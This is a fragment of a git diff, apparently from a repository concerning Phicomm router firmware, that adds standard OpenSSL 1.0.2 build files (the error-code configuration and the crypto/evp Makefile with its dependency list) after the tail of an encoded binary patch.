zpLfo==broJ_3a^T*zfZZE<W-i+3Imh$npbQdW@<uB9T4h_qKh1DVd~wLrEv?dl_}{
z+CpAkYU&MxjcO-C^U<p66hkdH(MPq{ReOc1n!OfXz5J>RDT!7!`&YDZo<&>NVMz<k
z=hcI)G@jM$!o^z)r<9Y*sjE16(!Q(O-`jUIdu0v%XhO%7jFQeARnOld?J(?OYlwgz
zgNX^ry%QREm=G8i@(Zi>{iOYeX0NmC)-|VZD-HXq>bw!^QXMVSsXFOUP<5<OyPJ*u
zwR)jyozt8|Xy8k%9b}@x%-t#fnFw|IwI%3k_D!o<1udvKpN9s(a11(Ks{MoNJc>hI
z##}XfV@!ithoe;*9;>pUE`C$H^C^@E^^I>;=S;13<HY!dYTJAHTCJuoxl@5cxrOJ2
zI)5z&GklpAOL>KsOSLyu=Y`?TT5W9=ez00DT1IpQetIi}^cLq1_g3g%9)2GrWMpvg
za4?*im@8Rx!RO_Ja-=W%+#Kyj-|COZkwXVuj57ggf(NEUn&BBak|BOVs>lNHpme$o
z@x7iRzWH`vckAw!_n{^c;CtD-H?bX-+8zIp)O9J4kb)PR64J*$e_jeIQdeARk4r6J
zg5!*#EeMaB20c#+A>9xc<GkySOI=PNE(I?&DN^`ivm!+nca2EPK~4H?zu%GW?te*I
z=$V360Wc*+z)F#V;I(b6uUOniSc~Id_b}Go(O@b~<aTYx3jl$-Cl5KV+IFu1t@3t;
zy#THHcK#4_{X%?NTVPl(<YJ$D2FPx%ZfgSstG-hLM7Si_>wUDvU9eqxXt#OC%)*T0
zUhztR?D8UlhZO7Yl|caY_>l(uSOcy%;COS@i+`>GzW}@g>ihw;D0ELk`w=|#;(XSC
zuQcF4HQ=`!@J-;D&nLJcLHJ(ofIjjo9!?C?)Mw3-oFlX5bji{uXPGiFT_&<N7{Q+?
z{`3=lL>rAOnm#%_d~_(Sr<J%iq?34ZRIlih(?!Eo4U4up%Pdlb#+@X(Ua_*d(|WFO
zTA$2LyYF5zr!9jFrBaXsjt<$B&5E9zAcLv#vGk~(R#QVtBAL*0bEavOtR1|NtrTd0
zDTBG|#p#lv=d)IpavBoGhWJx@$xX4ua@sL4%-+k~Iv#MFf9}6~a6h9Q5;)w+g!5s6
zcL+SgINX~A&n~w=!8o1|Tr<wg0>?AW`KrJl6ZnseWBgWu|H3%N?-KZZfj=(ry=<SL
z{SyKoVI1S{5%@{LzFXiQ3S7+J0UH#Ik6%eXuOR3s7#|-lX{K<_@3n%5^K)4BaDE=X
z^KgD1h+H{4V`V3xwM@4yaLqJ|S=ln?Eh5uhB~Mf;L^jLVLG!2#=Ob61nZf-jm&%qQ
z!>6&2Zg<w7D$U8WW_i{yt+U{Y0gZw_X=Y~(meBufg5Zy(_THp1U?{6>9o(L4%XMsV
z&2TMZ@Q5<TJ{1M#k9!tX{-waZgz_Xj$h}{*4sj9DkclT9@(gf{`Ct8`;EOT);Sq(8
zPyZ7WUhwgG8-sVKM+6&GpJMqx?cv;yw@G-<b<s5SFXulFPFQNM`Edq<Vo=a|{W(4Z
z3XbpfpJ(7_Zpd1%e-U`S_5Xqy&NDw;fBbKN`}6g$H#WK)XA63r<$-rnTOEIl>0Nt3
bB+NE+kEghvF2TFEo__=bgW&gD6tDl^EQko-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/openssl.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/openssl.ec
new file mode 100644
index 0000000..139afe3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/openssl.ec
@@ -0,0 +1,98 @@
+# crypto/err/openssl.ec
+
+# configuration file for util/mkerr.pl
+
+# files that may have to be rewritten by util/mkerr.pl
+L ERR		NONE				NONE
+L BN		crypto/bn/bn.h			crypto/bn/bn_err.c
+L RSA		crypto/rsa/rsa.h		crypto/rsa/rsa_err.c
+L DH		crypto/dh/dh.h			crypto/dh/dh_err.c
+L EVP		crypto/evp/evp.h		crypto/evp/evp_err.c
+L BUF		crypto/buffer/buffer.h		crypto/buffer/buf_err.c
+L OBJ		crypto/objects/objects.h	crypto/objects/obj_err.c
+L PEM		crypto/pem/pem.h		crypto/pem/pem_err.c
+L DSA		crypto/dsa/dsa.h		crypto/dsa/dsa_err.c
+L X509		crypto/x509/x509.h		crypto/x509/x509_err.c
+L ASN1		crypto/asn1/asn1.h		crypto/asn1/asn1_err.c
+L CONF		crypto/conf/conf.h		crypto/conf/conf_err.c
+L CRYPTO	crypto/crypto.h			crypto/cpt_err.c
+L EC		crypto/ec/ec.h			crypto/ec/ec_err.c
+L SSL		ssl/ssl.h			ssl/ssl_err.c
+L BIO		crypto/bio/bio.h		crypto/bio/bio_err.c
+L PKCS7		crypto/pkcs7/pkcs7.h		crypto/pkcs7/pkcs7err.c
+L X509V3	crypto/x509v3/x509v3.h		crypto/x509v3/v3err.c
+L PKCS12	crypto/pkcs12/pkcs12.h		crypto/pkcs12/pk12err.c
+L RAND		crypto/rand/rand.h		crypto/rand/rand_err.c
+L DSO		crypto/dso/dso.h		crypto/dso/dso_err.c
+L ENGINE	crypto/engine/engine.h		crypto/engine/eng_err.c
+L OCSP		crypto/ocsp/ocsp.h		crypto/ocsp/ocsp_err.c
+L UI		crypto/ui/ui.h			crypto/ui/ui_err.c
+L COMP		crypto/comp/comp.h		crypto/comp/comp_err.c
+L ECDSA		crypto/ecdsa/ecdsa.h		crypto/ecdsa/ecs_err.c
+L ECDH		crypto/ecdh/ecdh.h		crypto/ecdh/ech_err.c
+L STORE		crypto/store/store.h		crypto/store/str_err.c
+L TS		crypto/ts/ts.h			crypto/ts/ts_err.c
+L HMAC		crypto/hmac/hmac.h		crypto/hmac/hmac_err.c
+L CMS		crypto/cms/cms.h		crypto/cms/cms_err.c
+L JPAKE		crypto/jpake/jpake.h		crypto/jpake/jpake_err.c
+
+# additional header files to be scanned for function names
+L NONE		crypto/x509/x509_vfy.h		NONE
+L NONE		crypto/ec/ec_lcl.h		NONE
+L NONE		crypto/asn1/asn_lcl.h		NONE
+L NONE		crypto/cms/cms_lcl.h		NONE
+L NONE		ssl/ssl_locl.h			NONE
+
+
+F RSAREF_F_RSA_BN2BIN
+F RSAREF_F_RSA_PRIVATE_DECRYPT
+F RSAREF_F_RSA_PRIVATE_ENCRYPT
+F RSAREF_F_RSA_PUBLIC_DECRYPT
+F RSAREF_F_RSA_PUBLIC_ENCRYPT
+#F SSL_F_CLIENT_CERTIFICATE
+
+R SSL_R_SSLV3_ALERT_UNEXPECTED_MESSAGE		1010
+R SSL_R_SSLV3_ALERT_BAD_RECORD_MAC		1020
+R SSL_R_TLSV1_ALERT_DECRYPTION_FAILED		1021
+R SSL_R_TLSV1_ALERT_RECORD_OVERFLOW		1022
+R SSL_R_SSLV3_ALERT_DECOMPRESSION_FAILURE	1030
+R SSL_R_SSLV3_ALERT_HANDSHAKE_FAILURE		1040
+R SSL_R_SSLV3_ALERT_NO_CERTIFICATE		1041
+R SSL_R_SSLV3_ALERT_BAD_CERTIFICATE		1042
+R SSL_R_SSLV3_ALERT_UNSUPPORTED_CERTIFICATE	1043
+R SSL_R_SSLV3_ALERT_CERTIFICATE_REVOKED		1044
+R SSL_R_SSLV3_ALERT_CERTIFICATE_EXPIRED		1045
+R SSL_R_SSLV3_ALERT_CERTIFICATE_UNKNOWN		1046
+R SSL_R_SSLV3_ALERT_ILLEGAL_PARAMETER		1047
+R SSL_R_TLSV1_ALERT_UNKNOWN_CA			1048
+R SSL_R_TLSV1_ALERT_ACCESS_DENIED		1049
+R SSL_R_TLSV1_ALERT_DECODE_ERROR		1050
+R SSL_R_TLSV1_ALERT_DECRYPT_ERROR		1051
+R SSL_R_TLSV1_ALERT_EXPORT_RESTRICTION		1060
+R SSL_R_TLSV1_ALERT_PROTOCOL_VERSION		1070
+R SSL_R_TLSV1_ALERT_INSUFFICIENT_SECURITY	1071
+R SSL_R_TLSV1_ALERT_INTERNAL_ERROR		1080
+R SSL_R_TLSV1_ALERT_INAPPROPRIATE_FALLBACK	1086
+R SSL_R_TLSV1_ALERT_USER_CANCELLED		1090
+R SSL_R_TLSV1_ALERT_NO_RENEGOTIATION		1100
+R SSL_R_TLSV1_UNSUPPORTED_EXTENSION		1110
+R SSL_R_TLSV1_CERTIFICATE_UNOBTAINABLE		1111
+R SSL_R_TLSV1_UNRECOGNIZED_NAME			1112
+R SSL_R_TLSV1_BAD_CERTIFICATE_STATUS_RESPONSE	1113
+R SSL_R_TLSV1_BAD_CERTIFICATE_HASH_VALUE	1114
+
+R RSAREF_R_CONTENT_ENCODING			0x0400
+R RSAREF_R_DATA					0x0401
+R RSAREF_R_DIGEST_ALGORITHM			0x0402
+R RSAREF_R_ENCODING				0x0403
+R RSAREF_R_KEY					0x0404
+R RSAREF_R_KEY_ENCODING				0x0405
+R RSAREF_R_LEN					0x0406
+R RSAREF_R_MODULUS_LEN				0x0407
+R RSAREF_R_NEED_RANDOM				0x0408
+R RSAREF_R_PRIVATE_KEY				0x0409
+R RSAREF_R_PUBLIC_KEY				0x040a
+R RSAREF_R_SIGNATURE				0x040b
+R RSAREF_R_SIGNATURE_ENCODING			0x040c
+R RSAREF_R_ENCRYPTION_ALGORITHM			0x040d
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile
new file mode 100644
index 0000000..842f473
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile
@@ -0,0 +1,736 @@
+#
+# OpenSSL/crypto/evp/Makefile
+#
+
+DIR=	evp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=evp_test.c
+TESTDATA=evptests.txt
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= encode.c digest.c evp_enc.c evp_key.c evp_acnf.c evp_cnf.c \
+	e_des.c e_bf.c e_idea.c e_des3.c e_camellia.c\
+	e_rc4.c e_aes.c names.c e_seed.c \
+	e_xcbc_d.c e_rc2.c e_cast.c e_rc5.c \
+	m_null.c m_md2.c m_md4.c m_md5.c m_sha.c m_sha1.c m_wp.c \
+	m_dss.c m_dss1.c m_mdc2.c m_ripemd.c m_ecdsa.c\
+	p_open.c p_seal.c p_sign.c p_verify.c p_lib.c p_enc.c p_dec.c \
+	bio_md.c bio_b64.c bio_enc.c evp_err.c e_null.c \
+	c_all.c c_allc.c c_alld.c evp_lib.c bio_ok.c \
+	evp_pkey.c evp_pbe.c p5_crpt.c p5_crpt2.c \
+	e_old.c pmeth_lib.c pmeth_fn.c pmeth_gn.c m_sigver.c \
+	e_aes_cbc_hmac_sha1.c e_aes_cbc_hmac_sha256.c e_rc4_hmac_md5.c
+
+LIBOBJ=	encode.o digest.o evp_enc.o evp_key.o evp_acnf.o evp_cnf.o \
+	e_des.o e_bf.o e_idea.o e_des3.o e_camellia.o\
+	e_rc4.o e_aes.o names.o e_seed.o \
+	e_xcbc_d.o e_rc2.o e_cast.o e_rc5.o \
+	m_null.o m_md2.o m_md4.o m_md5.o m_sha.o m_sha1.o m_wp.o \
+	m_dss.o m_dss1.o m_mdc2.o m_ripemd.o m_ecdsa.o\
+	p_open.o p_seal.o p_sign.o p_verify.o p_lib.o p_enc.o p_dec.o \
+	bio_md.o bio_b64.o bio_enc.o evp_err.o e_null.o \
+	c_all.o c_allc.o c_alld.o evp_lib.o bio_ok.o \
+	evp_pkey.o evp_pbe.o p5_crpt.o p5_crpt2.o \
+	e_old.o pmeth_lib.o pmeth_fn.o pmeth_gn.o m_sigver.o \
+	e_aes_cbc_hmac_sha1.o e_aes_cbc_hmac_sha256.o e_rc4_hmac_md5.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= evp.h
+HEADER=	evp_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@[ -f $(TESTDATA) ] && cp $(TESTDATA) ../../test && echo "$(TESTDATA) -> ../../test/$(TESTDATA)"
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bio_b64.o: ../../e_os.h ../../include/openssl/asn1.h
+bio_b64.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+bio_b64.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_b64.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+bio_b64.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+bio_b64.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+bio_b64.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_b64.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_b64.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_b64.c
+bio_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+bio_enc.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+bio_enc.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_enc.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+bio_enc.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+bio_enc.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+bio_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_enc.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_enc.c
+bio_md.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_md.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_md.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_md.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+bio_md.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+bio_md.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bio_md.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+bio_md.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bio_md.o: ../cryptlib.h bio_md.c
+bio_ok.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_ok.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_ok.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_ok.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+bio_ok.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+bio_ok.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bio_ok.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+bio_ok.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_ok.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_ok.c
+c_all.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_all.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+c_all.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_all.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+c_all.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+c_all.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_all.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+c_all.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+c_all.o: ../cryptlib.h c_all.c
+c_allc.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_allc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+c_allc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_allc.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+c_allc.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+c_allc.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_allc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+c_allc.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+c_allc.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+c_allc.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+c_allc.o: ../../include/openssl/x509_vfy.h ../cryptlib.h c_allc.c
+c_alld.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_alld.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+c_alld.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_alld.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+c_alld.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+c_alld.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_alld.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+c_alld.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+c_alld.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+c_alld.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+c_alld.o: ../../include/openssl/x509_vfy.h ../cryptlib.h c_alld.c
+digest.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+digest.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+digest.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+digest.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+digest.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+digest.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+digest.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+digest.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+digest.o: ../cryptlib.h digest.c
+e_aes.o: ../../include/openssl/aes.h ../../include/openssl/asn1.h
+e_aes.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+e_aes.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_aes.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_aes.o: ../../include/openssl/modes.h ../../include/openssl/obj_mac.h
+e_aes.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_aes.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_aes.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+e_aes.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_aes.o: ../modes/modes_lcl.h e_aes.c evp_locl.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/aes.h ../../include/openssl/asn1.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/bio.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/crypto.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/e_os2.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/evp.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/modes.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/obj_mac.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/objects.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/opensslconf.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/opensslv.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/ossl_typ.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/rand.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/safestack.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/sha.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/stack.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/symhacks.h ../modes/modes_lcl.h
+e_aes_cbc_hmac_sha1.o: e_aes_cbc_hmac_sha1.c
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/aes.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/asn1.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/bio.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/crypto.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/e_os2.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/evp.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/modes.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/obj_mac.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/objects.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/opensslconf.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/opensslv.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/ossl_typ.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/rand.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/safestack.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/sha.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/stack.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/symhacks.h ../modes/modes_lcl.h
+e_aes_cbc_hmac_sha256.o: e_aes_cbc_hmac_sha256.c
+e_bf.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_bf.o: ../../include/openssl/blowfish.h ../../include/openssl/buffer.h
+e_bf.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_bf.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_bf.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_bf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_bf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_bf.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_bf.o: ../../include/openssl/symhacks.h ../cryptlib.h e_bf.c evp_locl.h
+e_camellia.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_camellia.o: ../../include/openssl/camellia.h ../../include/openssl/crypto.h
+e_camellia.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_camellia.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_camellia.o: ../../include/openssl/modes.h ../../include/openssl/obj_mac.h
+e_camellia.o: ../../include/openssl/objects.h
+e_camellia.o: ../../include/openssl/opensslconf.h
+e_camellia.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_camellia.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_camellia.o: ../../include/openssl/symhacks.h ../modes/modes_lcl.h
+e_camellia.o: e_camellia.c evp_locl.h
+e_cast.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_cast.o: ../../include/openssl/buffer.h ../../include/openssl/cast.h
+e_cast.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_cast.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_cast.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_cast.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_cast.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_cast.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_cast.o: ../../include/openssl/symhacks.h ../cryptlib.h e_cast.c evp_locl.h
+e_des.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_des.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_des.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+e_des.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_des.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_des.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_des.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_des.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+e_des.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_des.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+e_des.o: ../../include/openssl/ui_compat.h ../cryptlib.h e_des.c evp_locl.h
+e_des3.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_des3.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_des3.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+e_des3.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_des3.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_des3.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_des3.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_des3.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+e_des3.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+e_des3.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_des3.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+e_des3.o: ../cryptlib.h e_des3.c evp_locl.h
+e_idea.o: ../../e_os.h ../../include/openssl/bio.h
+e_idea.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_idea.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_idea.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+e_idea.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_idea.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_idea.o: ../../include/openssl/symhacks.h ../cryptlib.h e_idea.c
+e_null.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_null.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_null.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_null.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_null.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+e_null.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_null.o: ../cryptlib.h e_null.c
+e_rc2.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_rc2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_rc2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_rc2.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_rc2.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_rc2.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_rc2.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc2.h
+e_rc2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_rc2.o: ../../include/openssl/symhacks.h ../cryptlib.h e_rc2.c evp_locl.h
+e_rc4.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_rc4.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_rc4.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_rc4.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_rc4.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_rc4.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_rc4.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc4.h
+e_rc4.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_rc4.o: ../../include/openssl/symhacks.h ../cryptlib.h e_rc4.c evp_locl.h
+e_rc4_hmac_md5.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_rc4_hmac_md5.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
